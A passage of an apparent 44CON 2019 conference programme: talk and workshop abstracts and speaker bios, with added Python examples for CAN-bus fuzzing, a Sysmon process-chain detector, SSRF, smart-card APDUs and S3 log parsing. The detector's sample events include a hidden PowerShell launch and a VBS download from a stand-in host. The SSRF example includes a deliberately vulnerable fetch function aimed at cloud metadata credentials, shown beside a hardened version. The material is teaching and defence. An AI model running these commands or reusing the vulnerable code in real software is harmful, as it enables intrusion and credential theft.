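        if can_id > CAN_EFF_MASK:
            raise ValueError("extended ID exceeds 29 bits")
        can_id |= CAN_EFF_FLAG
    elif can_id > CAN_SFF_MASK:
        raise ValueError("standard ID exceeds 11 bits")
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))


def parse_frame(raw: bytes) -> Tuple[int, bool, bytes]:
    """Inverse of build_frame: (identifier, is_extended, payload cut to DLC)."""
    can_id, dlc, data = struct.unpack(CAN_FRAME_FMT, raw[:CAN_FRAME_LEN])
    extended = bool(can_id & CAN_EFF_FLAG)
    ident = can_id & (CAN_EFF_MASK if extended else CAN_SFF_MASK)
    return ident, extended, data[:dlc]


def id_sweep(payload: bytes, first: int = 0, last: int = CAN_SFF_MASK) -> Iterator[bytes]:
    """Stage one: the same payload on every ID while you watch which gauge
    twitches. A cluster listens to a handful of IDs, so 2048 frames is quick."""
    for can_id in range(first, last + 1):
        yield build_frame(can_id, payload)


def byte_walk(can_id: int, value: int = 0xFF) -> Iterator[bytes]:
    """Stage two: once an ID reacts, drive one byte at a time to map bytes (or
    bit fields within them) to speedo, rev counter, fuel and temperature."""
    for pos in range(8):
        data = bytearray(8)
        data[pos] = value
        yield build_frame(can_id, bytes(data))


def send_frames(interface: str, frames: Iterable[bytes]) -> int:
    """Push frames onto a SocketCAN interface such as 'can0'. Linux only, and
    the link must be up (ip link set can0 up type can bitrate 500000). Do this
    on a bench cluster, never on a bus attached to a moving vehicle."""
    with socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as sock:
        sock.bind((interface,))
        sent = 0
        for frame in frames:
            sock.send(frame)
            sent += 1
    return sent


if __name__ == "__main__":
    frame = build_frame(0x3D9, b"\x00\x10\x27\x00")
    print(frame.hex(), parse_frame(frame))
```

The bit rate is the thing to get right first: a cluster on a 500 kbit/s bus will not respond to anything sent at 125 kbit/s, and a wrong rate can put the adapter into bus-off. Dump traffic with `candump` before fuzzing, since the IDs that are already on the bus are the most likely ones to matter.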

Ian Tabor

Network/security architect with a passion for car hacking. Ian has found vulnerabilities in his own car and through private car bug bounties. He now runs Car Hacking Village UK and is part of the team behind the CHV at DEF CON.

Introduction to GLIBC heap exploitation

A 2-hour workshop introducing folks to the basics of GLIBC heap exploitation, covering two publicly known but oft-misunderstood GLIBC heap exploit methods. VMs will be provided for the workshop, and the "House of Force" and "fastbin dup" techniques will be covered in depth.

Students will learn two heap exploitation techniques whilst writing exploits against two vulnerable binaries. It is aimed at those with little to no GLIBC heap experience. A lot of people who CTF are keen on learning about heap exploitation, since there are always heap-based challenges and each year new techniques are brought to light. What stops them from learning these techniques is the misconception that heap exploits are prohibitively difficult to write; my workshop is there to dispel this myth and provide a starting point for those who wish to start learning new exploit development techniques.

Max Kamper, Applied Intelligence Laboratories

An ex-Royal Marines Commando turned cyber-security enthusiast. Max cut his teeth on electronic warfare operations and now works as a researcher for Applied Intelligence Laboratories. Author of the “ROP Emporium”, he spends his time compiling the GNU C library and wondering how those MOVAPS instructions got into that one version on Ubuntu.

Logging Made Easy

Logging Made Easy (LME) is a tried and tested self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks. LME is designed to be a quick-to-deploy logging solution giving you access to useful logs when you need them. Led by NCSC, developed in collaboration with NCC Group and funded by the Cabinet Office, LME provides an organisation with a simple to deploy, simple to maintain and simple to use logging solution. LME allows users with both limited and advanced knowledge to perform performance monitoring, incident response and threat hunting activity. LME gathers the logs that provide this capability both from the built-in Windows event logging and from Microsoft Sysmon.

This log data can be searched for, to name but a few, file hashes, file names and nefarious launches such as Microsoft Word launching PowerShell, which then launches Internet Explorer to download and execute VBS. At the other end of the attack spectrum, LME allows you to see which applications are crashing on your estate, along with other performance-related logs, allowing you to be one step ahead of some potential problems.

We will run through this tutorial and then provide you with an environment to give it a go yourself (with a bit of magic for the slow Windows bits).

A hands-on look into the Logging Made Easy solution, from set-up and roll-out to testing and example uses. This workshop aims to show attendees how to deploy and use LME over a provided test network, featuring hands-on practicals and scenarios to test out functionality in LME and get a grasp of how this data can be leveraged to achieve greater visibility into actions occurring on hosts across your estate.
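The Word-to-PowerShell-to-Internet Explorer launch chain mentioned above, as an added detection example (not part of LME itself): it walks Sysmon Event ID 1 parent links and fires on the leaf process whose lineage contains the chain in order. The event records are constructed for the example, with illustrative paths, GUIDs and command lines; the rule names and the `.invalid` URL are the example's own.

```python
"""Added example for the workshop above (not part of LME itself): flag the
Word -> PowerShell -> Internet Explorer launch chain by walking parent links
in Sysmon process-creation events (Event ID 1). The events are constructed
for the example; paths, GUIDs and command lines are illustrative."""
from typing import Dict, List, Sequence

# Constructed Sysmon Event ID 1 records, cut down to the fields the rule needs.
# ProcessGuid/ParentProcessGuid are used rather than PIDs because Windows
# reuses PIDs and Sysmon's GUIDs are unique per process instance.
EVENTS = [
    {"UtcTime": "2019-09-12 10:01:02", "ProcessGuid": "{g-1}", "ParentProcessGuid": "{g-0}",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"UtcTime": "2019-09-12 10:02:10", "ProcessGuid": "{g-2}", "ParentProcessGuid": "{g-1}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\invoice.docm"'},
    {"UtcTime": "2019-09-12 10:02:31", "ProcessGuid": "{g-3}", "ParentProcessGuid": "{g-2}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c Start-Process iexplore.exe"},
    {"UtcTime": "2019-09-12 10:02:33", "ProcessGuid": "{g-4}", "ParentProcessGuid": "{g-3}",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "iexplore.exe http://example.invalid/update.vbs"},
    {"UtcTime": "2019-09-12 10:02:40", "ProcessGuid": "{g-5}", "ParentProcessGuid": "{g-4}",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\u\AppData\Local\Temp\update.vbs"},
    # Benign control: an admin opening PowerShell from Explorer must not fire.
    {"UtcTime": "2019-09-12 10:05:00", "ProcessGuid": "{g-6}", "ParentProcessGuid": "{g-1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

# Rules are ordered chains of executable names, root first. Intermediate hops
# (cmd.exe, conhost.exe) are allowed in between, so inserting one does not
# hide the pattern.
RULES: Dict[str, List[str]] = {
    "office_to_powershell_to_ie": ["winword.exe", "powershell.exe", "iexplore.exe"],
    "office_to_script_host": ["winword.exe", "wscript.exe"],
}


def basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(events: List[dict], guid: str) -> List[str]:
    """Executable names from the process up to the root, stopping at the
    first parent Sysmon never recorded (e.g. one started before the service)."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        e = by_guid[guid]
        chain.append(basename(e["Image"]))
        guid = e["ParentProcessGuid"]
    return chain


def is_subsequence(needle: Sequence[str], haystack: Sequence[str]) -> bool:
    it = iter(haystack)
    return all(any(x == y for y in it) for x in needle)


def find_chains(events: List[dict], chain: Sequence[str]) -> List[dict]:
    """Events whose lineage (root -> leaf) contains `chain` in order and which
    are themselves the last link, so each chain fires once, on the leaf."""
    wanted = [c.lower() for c in chain]
    hits = []
    for e in events:
        lineage = list(reversed(ancestry(events, e["ProcessGuid"])))
        if basename(e["Image"]) == wanted[-1] and is_subsequence(wanted, lineage):
            hits.append({"UtcTime": e["UtcTime"], "ProcessGuid": e["ProcessGuid"],
                         "lineage": " -> ".join(lineage), "CommandLine": e["CommandLine"]})
    return hits


def run_rules(events: List[dict] = EVENTS) -> Dict[str, List[dict]]:
    return {name: find_chains(events, chain) for name, chain in RULES.items()}


if __name__ == "__main__":
    for rule, hits in run_rules().items():
        for h in hits:
            print(f"[{rule}] {h['UtcTime']} {h['lineage']}")
```

Matching on lineage rather than on the immediate parent is what makes the rule survive a `cmd.exe /c` or `conhost.exe` inserted in the middle; the price is that lineage is only as complete as Sysmon's coverage, so a chain that started before the Sysmon service did will be cut off at the first unrecorded parent.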

Duncan Atkin, NCC Group

Duncan is a fully certified lumberjack, capable of processing massive volumes of logs. When not processing logs, he enjoys growing trees and making cider with the fruits of his labour.

(Duncan did not submit a bio)

NCSC Representatives

NCSC Representatives are not permitted to submit bios, and while funny to make one up, it would be cruel for us to do so, so we’re leaving this blank.

RFID Hacking Tools Workshop

A 101 & upwards workshop on Radio Frequency Identification, tools, and how to make your own access control system.
If you’re new to Arduino, RFID or basic electronics, this is the workshop for you!

To start off, an intro into RFID theory and how this is practically applied with the use of tools on the market such as the Proxmark RDV4.

We will cover some basics of electronics and, with breadboards, teach you how to put your own circuit together; this will come in handy when we use these basics to help you build your own MFRC522 reader setup.
We will explore the Arduino MFRC522 library, working our way through the scripts and learning how they can be adapted and built upon to bring everything together, building your very own access control system.

There is no registration, but you will need one of these kits. We will have some available from the front desk, and Chrissy has some available to borrow for those who can't afford the kits.

Please note, this workshop will not be filmed.

Chrissy Morgan

Chrissy heads up the IT Security Operations for a Close Protection (Bodyguard) company by day and is a Security Researcher by night.

As an advocate of practical learning, Chrissy also takes part in bug bounty programs and has found bugs in platforms such as Microsoft and Whois.com. She has carried out research in the areas of Steganography, RFID, Physical Cyber Systems Security and is actively involved within the information security community across a wealth of subjects.

44CON 2019 Village Hall

The Village hall has a mix of vendor, community and general activities. We’ve usually had a hidden track, and this year we’re putting it in the main hall, which means it’s not really hidden. All activities will be filmed unless otherwise specified.

Owning The Cloud Through SSRF

With so many apps running in the cloud, hacking these instances becomes easier with a single vulnerability caused by unsanitised user input. In this talk, we'll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality and social media companies and make $50,000 in rewards in 3 months.
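The cloud SSRF the abstract refers to, as an added example (not the speaker's code): the fetch-by-URL feature that forwards user input to an outbound request, beside a guard that decides on the addresses the host actually resolves to and re-checks every redirect hop. Function names and the 4 KiB preview limit are the example's own choices; the link-local metadata address 169.254.169.254 is the standard EC2 one.

```python
"""Added example for the talk above (not the speaker's code): the fetch-by-URL
feature that invites SSRF, beside a guard that decides on resolved addresses
and re-checks every redirect. Function names and the 4 KiB preview limit are
the example's own choices."""
import ipaddress
import socket
import urllib.error
import urllib.request
from typing import Tuple, Union
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def fetch_preview_vulnerable(url: str, timeout: float = 5.0) -> bytes:
    """The bug: user input goes straight into an outbound request. With
    url='http://169.254.169.254/latest/meta-data/iam/security-credentials/'
    an EC2 instance on IMDSv1 hands its role credentials to whoever asked."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read(4096)


def _is_public(addr: IPAddress) -> bool:
    return not (addr.is_loopback or addr.is_link_local or addr.is_private
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def is_safe_target(url: str) -> Tuple[bool, str]:
    """Decide on the addresses the host resolves to, not on the host string:
    '0x7f000001', '2130706433', 'localhost' and a DNS name pointing at 10.0.0.5
    all fail here, and all of them walk straight past a string denylist."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        addrs = [ipaddress.ip_address(host)]            # literal: no lookup needed
    except ValueError:
        try:
            infos = socket.getaddrinfo(host, port or 80, proto=socket.IPPROTO_TCP)
        except socket.gaierror as exc:
            return False, f"cannot resolve {host}: {exc}"
        addrs = [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]
    blocked = [str(a) for a in addrs if not _is_public(a)]
    if blocked:
        return False, f"{host} resolves to non-public {', '.join(blocked)}"
    return True, "ok"


class _CheckedRedirects(urllib.request.HTTPRedirectHandler):
    """A 302 from a public host to http://169.254.169.254/ is the usual bypass
    of a check that only looks at the first URL, so every hop is re-validated."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        ok, why = is_safe_target(newurl)
        if not ok:
            raise urllib.error.HTTPError(newurl, code, f"redirect refused: {why}", headers, fp)
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_preview_hardened(url: str, timeout: float = 5.0) -> bytes:
    ok, why = is_safe_target(url)
    if not ok:
        raise ValueError(why)
    opener = urllib.request.build_opener(_CheckedRedirects())
    with opener.open(url, timeout=timeout) as resp:
        return resp.read(4096)
```

Two caveats a reviewer would raise: the lookup in `is_safe_target` and the one urllib performs when connecting are separate, so a DNS rebinding attacker can answer the first with a public address and the second with a private one; the robust fix is to connect to the address you validated (or to route all such fetches through an egress proxy that enforces the policy). Separately, IMDSv2 requires a session token obtained with a PUT request, which a plain GET-based SSRF cannot produce, so enforcing IMDSv2 on the instance is a defence that does not depend on the application code at all.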

Cody Brocious

Cody Brocious is a security researcher and educator with over 15 years of experience in the field. While best known for his work in compromising hotel locks, Cody has worked on security for countless companies and products and has directed that expertise into Hacker 101.

CI/CD pipelines are the perfect, bug-rich target for new and experienced bug hunters. As complex, user-controlled automated processes with access to authentication secrets, source code, and application servers in multi-system, multi-user environments, they combine all the things that make bugs likely. In the presentation, I will outline a methodology for hunting for bugs in CI/CD pipelines and walk through actual bugs which have resulted in tens of thousands of dollars in bounty payments.

Alex Chapman

Alex Chapman is a full-time Bug Hunter primarily focused on vulnerability discovery, protocol analysis, and reverse engineering. Having spent over a decade of his life as a red teamer and penetration tester he jumped headfirst into the Bug Bounty industry spending time as a program advisor, platform technical advisor and now bug hunter. He has been credited in security advisories for a number of major software products for vendors such as Citrix, Google, Mozilla, and VMware, and has presented his research at security conferences around the world. He generally spends his time making things, poking holes in complex systems, and pointing out security flaws which have no place in modern-day software.

Automating user interaction with Sheepl: Soup to Nuts

Sheepl is a tool designed to emulate user behaviour and has matured into a platform for supporting tradecraft development for both red and blue teams. The tool was born out of a personal need for ‘sparring’ partners without the predictability of knowing when things are going to happen.

Using a representative network I plan to give participants hands on experience of creating Sheepl that can be used to attack, execute commands and emulate real world user actions such as browsing, opening emails, interacting with command environments and creating content.

The environment will also have a monitoring solution deployed that can be used to trace commands that will be executed from the ATT&CK framework. The workshop will also cover creating Sheepl that respond to events on a system and the example used will be to create Sheepl that watch for supplied process names and kill these automatically after a period of time. This is good for operational security considerations when looking at Red Team tradecraft development and for CTF style events.

I will also show the process of creating custom tasks to extend Sheepl capabilities and how sequences of tasks can be saved as JSON profiles. The goal is that by the end of the workshop, participants will have a solid understanding of the planning and workflow for creating Sheepl that support specific learning objectives as well as generating more realistic end user behaviour within training environments.

Matt Lorentzen

Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements.

Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.

Breaking Badge: A 101 Crash Course Smart Card Hacking Workshop

Because Steve’s lab imploded earlier this year (unrelated to any ongoing particle physics experiments), we’re using a smart card based badge based on the unhackable* SLE4442 smart card. There’s a competition to win an Atari Portfolio palmtop computer, the same model as seen in Terminator 2. To win, you need to develop the best solution that:

Relies upon the SLE4442 smart card for some form of security-related functionality.

Is not weakened by the use of the SLE4442 smart card.

Tim and Phyushin are running a workshop on the card, how to read from it, write to it and do things with it. You’ll learn the basics of smart card hacking, how to use and abuse APDUs and a little on the wonderful dissonance between the term “access control” and the act of controlling access effectively.

We’ll have Omnikey 3021 readers for you to play with, which need to be returned to the locksport area after the workshop so people can use them to take part in the competition.

*At least BitFi grade levels of unhackable.
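For the "use and abuse APDUs" part of the workshop, an added example (not the workshop's own code): building ISO 7816-4 short APDUs and decoding the status words that come back. The SLE4442 is a synchronous memory card, so a PC/SC reader such as the Omnikey wraps it in reader-specific pseudo-APDUs; those vendor commands are not modelled here, only the ISO layer, and the AID, PIN and offsets used are arbitrary example values.

```python
"""Added example for the workshop above (not the workshop's own code): build
ISO 7816-4 short APDUs and decode the status words that come back, which is
most of what 'using and abusing APDUs' amounts to. Only the ISO layer is
modelled; reader-specific pseudo-APDUs for synchronous cards are not."""
from typing import Optional, Tuple


def build_apdu(cla: int, ins: int, p1: int, p2: int, data: bytes = b"",
               le: Optional[int] = None) -> bytes:
    """Cases 1-4 of the short APDU: CLA INS P1 P2 [Lc data] [Le].
    le=256 is sent as 0x00, the ISO shorthand for 'up to 256 bytes'."""
    for name, value in (("CLA", cla), ("INS", ins), ("P1", p1), ("P2", p2)):
        if not 0 <= value <= 0xFF:
            raise ValueError(f"{name} out of range: {value:#x}")
    if len(data) > 255:
        raise ValueError("short APDU carries at most 255 data bytes")
    apdu = bytes([cla, ins, p1, p2])
    if data:
        apdu += bytes([len(data)]) + data
    if le is not None:
        if not 0 <= le <= 256:
            raise ValueError("Le must be 0..256")
        apdu += bytes([le & 0xFF])
    return apdu


# Three standard ISO 7816-4 commands as they are usually typed at a card.
def select_by_aid(aid: bytes) -> bytes:
    return build_apdu(0x00, 0xA4, 0x04, 0x00, aid, le=256)


def read_binary(offset: int, length: int) -> bytes:
    return build_apdu(0x00, 0xB0, (offset >> 8) & 0x7F, offset & 0xFF, le=length)


def verify(pin: bytes, reference: int = 0x00) -> bytes:
    return build_apdu(0x00, 0x20, 0x00, reference, pin)


def parse_response(raw: bytes) -> Tuple[bytes, int]:
    """Split a response into (data, SW1SW2)."""
    if len(raw) < 2:
        raise ValueError("response shorter than the two status bytes")
    return raw[:-2], (raw[-2] << 8) | raw[-1]


def pin_tries_left(sw: int) -> Optional[int]:
    """0x63Cx encodes the remaining PIN attempts; None for any other status."""
    if (sw & 0xFFF0) == 0x63C0:
        return sw & 0x0F
    return None


def describe_sw(sw: int) -> str:
    sw1, sw2 = sw >> 8, sw & 0xFF
    if sw == 0x9000:
        return "OK"
    if sw1 == 0x61:
        return f"OK, {sw2} more bytes available (GET RESPONSE)"
    if sw1 == 0x6C:
        return f"wrong Le, resend with Le={sw2}"
    tries = pin_tries_left(sw)
    if tries is not None:
        return f"verification failed, {tries} tries left"
    return {
        0x6982: "security status not satisfied",
        0x6983: "authentication method blocked",
        0x6A82: "file not found",
        0x6A86: "incorrect P1/P2",
        0x6D00: "INS not supported",
        0x6E00: "CLA not supported",
    }.get(sw, f"unknown status {sw:04X}")


def guess_should_continue(sw: int, reserve: int = 1) -> bool:
    """Brute-forcing a PIN is bounded by the retry counter: stop while at least
    `reserve` tries remain, or the card locks and the badge is bricked for good."""
    tries = pin_tries_left(sw)
    return tries is not None and tries > reserve
```

The retry counter is the practical caveat for anyone tempted to guess a PIN: the SLE4442 keeps a three-attempt error counter for its programmable security code, and once it reaches zero the card is permanently write-locked, so a script that does not read the counter before each guess will destroy the badge it is attacking.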

Tim Wilkes and Phyushin

Tim is a failed electronics engineer who ended up being a sysadmin, which then landed him in security. Tim enjoys lockpicking, cold brew, HID attacks and smart card hacking.

Phyushin is a puppet duck which appeared on the CBBC interstitial programme The Broom Cupboard alongside presenters Andy Crane and Andi Peters. Since leaving the BBC, he’s been heavily involved in Leigh Hackspace, and would one day like to learn to code.

Here be dragons… the AWS S3 logging minefields

Cloud based services have become the norm. Your services are in the cloud, your data is in the cloud, your logs are in the cloud. What are the new challenges and concerns with this approach?

In this talk, SpectX will share its data-driven research into the reliability and trustworthiness of S3 server access logs. How does S3 server access logging work? What does Amazon's best-effort log delivery look like in practice? When and how should you analyse the logs? What should you ask? Can you trust the results? If not, what's the workaround?
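As an added example for the questions above (not SpectX's code): a parser for the S3 server access log format and the two sanity checks you want before trusting what it tells you, the empty hours that best-effort delivery can leave behind, and the anonymous or refused requests that are the usual security findings. The three log lines are constructed for the example (bucket, owner ID and request IDs are placeholders); the field order is the documented S3 one, with newer trailing fields kept as `extra`.

```python
"""Added example for the talk above (not SpectX's code): a parser for S3
server access log lines plus two checks you want before trusting them: the
empty hours that best-effort delivery can leave behind, and anonymous or
refused requests. The three log lines are constructed for the example."""
import re
from collections import Counter
from datetime import datetime, timedelta
from typing import Dict, List

# Field order of the S3 server access log format; AWS appends new fields at
# the end, so anything past these is kept as 'extra' rather than rejected.
FIELDS = [
    "bucket_owner", "bucket", "time", "remote_ip", "requester", "request_id",
    "operation", "key", "request_uri", "http_status", "error_code", "bytes_sent",
    "object_size", "total_time", "turn_around_time", "referer", "user_agent",
    "version_id", "host_id", "signature_version", "cipher_suite",
    "authentication_type", "host_header", "tls_version",
]
INT_FIELDS = ("http_status", "bytes_sent", "object_size", "total_time", "turn_around_time")
# A token is a [bracketed time], a "quoted string", or a run of non-space.
TOKEN = re.compile(r'\[([^\]]*)\]|"([^"]*)"|(\S+)')

# Constructed sample: an anonymous read that succeeded, an anonymous read that
# was refused, and an authenticated write, with a two-hour hole in between.
SAMPLE_LOG = """\
bcd0b1a2EXAMPLEOWNERID examplebucket [12/Sep/2019:09:15:02 +0000] 192.0.2.44 - 3E57427F33A59F07 REST.GET.OBJECT reports/q3.pdf "GET /reports/q3.pdf HTTP/1.1" 200 - 48210 48210 35 12 "-" "Mozilla/5.0" - hostidEXAMPLE= - ECDHE-RSA-AES128-GCM-SHA256 - examplebucket.s3.eu-west-1.amazonaws.com TLSV1.2
bcd0b1a2EXAMPLEOWNERID examplebucket [12/Sep/2019:09:40:11 +0000] 198.51.100.7 - 8B4A9C1D2E3F4A5B REST.GET.OBJECT secret/backup.zip "GET /secret/backup.zip HTTP/1.1" 403 AccessDenied 243 - 4 - "-" "curl/7.64.1" - hostidEXAMPLE= - ECDHE-RSA-AES128-GCM-SHA256 - examplebucket.s3.eu-west-1.amazonaws.com TLSV1.2
bcd0b1a2EXAMPLEOWNERID examplebucket [12/Sep/2019:12:05:45 +0000] 192.0.2.44 bcd0b1a2EXAMPLEOWNERID 7C6D5E4F3A2B1C0D REST.PUT.OBJECT reports/q4.pdf "PUT /reports/q4.pdf HTTP/1.1" 200 - - 51200 60 18 "-" "aws-cli/1.16.200" - hostidEXAMPLE= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader examplebucket.s3.eu-west-1.amazonaws.com TLSV1.2
"""


def tokenize(line: str) -> List[str]:
    return [a or b or c for a, b, c in TOKEN.findall(line)]


def parse_line(line: str) -> Dict[str, object]:
    toks = tokenize(line)
    if len(toks) < 18:
        raise ValueError(f"not an S3 access log line: {line[:60]!r}")
    rec: Dict[str, object] = {name: (None if v == "-" else v) for name, v in zip(FIELDS, toks)}
    rec["extra"] = toks[len(FIELDS):]
    rec["time"] = datetime.strptime(toks[2], "%d/%b/%Y:%H:%M:%S %z")
    for name in INT_FIELDS:
        if rec.get(name) is not None:
            rec[name] = int(rec[name])
    return rec


def parse_log(text: str) -> List[Dict[str, object]]:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def hourly_gaps(records: List[Dict[str, object]]) -> List[datetime]:
    """Hours between the first and last record with no entries at all. Under
    best-effort delivery an empty hour can mean no traffic, logs still on their
    way, or logs that will never arrive; treat it as unknown, not as quiet."""
    per_hour = Counter(r["time"].replace(minute=0, second=0, microsecond=0) for r in records)
    if not per_hour:
        return []
    t, end, gaps = min(per_hour), max(per_hour), []
    while t <= end:
        if per_hour[t] == 0:
            gaps.append(t)
        t += timedelta(hours=1)
    return gaps


def anonymous_requests(records: List[Dict[str, object]]) -> int:
    """Requester '-' means unauthenticated: a 200 here is a public object."""
    return sum(1 for r in records if r["requester"] is None)


def refused_keys(records: List[Dict[str, object]]) -> List[str]:
    """Keys that drew a 403: the usual footprint of someone guessing names."""
    return [r["key"] for r in records if r["http_status"] == 403 and r["key"]]
```

The gap check is the one that matters for the talk's question about trust: a zero count in an hour is evidence of nothing, because the missing lines may simply not have been delivered yet, so any alert built on "no requests were seen" needs a second source, such as CloudTrail data events, before it is believed.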

Kieren Nicolas Lovell

Kieren Nicolas Lovell is a security expert from the University of Cambridge (King's and Pembroke College), Tallinn University of Technology, and SpectX, a log analysis tool. He is also the incident response instructor at the Defence Academy of the UK. Previously, he has been the Head of CamCERT and the CISO at Standing NATO Maritime Group One, which was deployed for nine months mitigating the pirate threat.

From fuzzing to free reign – Finding zero days with Tenable Research

Over the last 18 months, Tenable Research have been hitting the headlines with major vulnerabilities discovered in household names and critical devices. Some read like a Hollywood script, enabling an attacker to break into an office undetected; others highlight huge flaws in critical infrastructure. Join Leslie Forbes from Tenable as he explores the more notable disclosures, how they were found and the impact they have on us all.

Leslie Forbes

Leslie Forbes is a Product Specialist for Tenable, engaging with medium and large businesses to understand their requirements for vulnerability management programs and to advise on their deployment strategies. His electronic engineering background and system administration credentials help him quickly grasp the unique challenges in each enterprise. He understands how good security can work with existing processes in all types of organizations. Prior to joining Tenable, Leslie worked for two large multinational anti-virus vendors.

Scout Suite – A Multi-Cloud Security Auditing Tool

Scout Suite (https://github.com/nccgroup/ScoutSuite) is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
The following cloud providers are currently supported:

Amazon Web Services

Microsoft Azure

Google Cloud Platform

Oracle Cloud Infrastructure

Alibaba Cloud

During the presentation, we will run Scout Suite against a number of cloud environments preconfigured with typical flaws, and demonstrate how Scout Suite can be used to identify and help remediate security misconfigurations.

Xavier Garceau-Aranda

Xavier is a senior security consultant at NCC Group, with experience in both academia and the private sector. He has worked as a developer and security consultant, focusing on application security. Xavier currently spends most of his time focusing on cloud security, as well as driving the development of Scout Suite, an open source multi-cloud security-auditing tool.

44CON 2019 Mental Health Village

The Mental Health Village has a ton of events to help with wellbeing for those working in the industry. These talks are scheduled to take place in the Mental Health Village.

Engineering resilience in the Fleshy Orchestration Layer

The Fleshy Orchestration Layer is a vital component in our cyber security and resilience tool chest, characterised by heuristic learning, an ability to operate in unconventional environments (humid, caffeinated, full of cheese) and a susceptibility to catastrophic issues when subjected to sustained load. Industry trends suggest that these failure modes are increasing in severity and occurrence.

The Fleshy Orchestration Layer operates our tools and implements our processes. It is prudent (and ethical) to treat instances within the Fleshy Orchestration Layer as pets, not cattle, and for organisations and teams to invest effort in structures and processes that can support these instances.

If you hadn’t figured it out by now, the Fleshy Orchestration Layer is you.

We invest huge sums into cybersecurity tooling. We crib from international governance frameworks when building our processes. We struggle to hire rare talent from a shallow pool, put them in front of a raging bin fire and watch them fall over.

Our roles have an adversarial, reactive, high-pressure nature that's at high risk of breaking people down and exacerbating existing conditions. I'll be using my own experiences within mental health and cybersecurity, as well as my time as a Search and Rescue medic, EPO and Ambulance Responder, to frame the risks we face. I'll then suggest practical steps that teams and organisations can take to protect cybersecurity personnel in the face of our modern mental health crisis.

Tom Owen

Tom is a classic corporate security wonk, currently working as Head of Security for a Cloud company in the UK, building and managing security teams and things. Previously he did Security Stuff as a consultant and spent time doing Security Stuff in e-commerce, development and hosting. He is definitely not an industry rock-star but has completed his 10,000 hours. He spends a lot of time thinking about scary outcomes and how to mitigate them, and how to best protect and support the people he works with.

Tom was also, until recently, Emergency Planning Officer and a medic for one of the busiest Search and Rescue units in the UK (the identity of which will surprise you) and a first responder for the ambulance service.

Your Primer To Mental Health First Aid

In the Computer Security industry, just like other tech industries, it is paramount to look after ourselves and others – both physically and mentally. Understanding how you can support yourself and others when going through mental health experiences is just as important in both your personal and professional lives. From understanding mental health terminology to covering the basics of mental health first aid this workshop will set you off on the right track.

Outcome of The Workshop:

This guided workshop seeks to break down some key techniques that can be added to your Mental Health Awareness toolbox. We'll go through each of these key areas, drawing out similarities between physical and mental health first aid. After each section we'll break off into groups to further develop our understanding of the techniques.

What is mental health?

The spectrum of mental health.

What are frames of reference?

Making a stress container.

The principles of first aid.

Tips for signposting.

James Stevenson

James Stevenson is a software engineer and security researcher, with a history of security operations. James is also a qualified Physical and Mental Health First Aider, and in the past has worked alongside the British Red Cross in Event First Aid.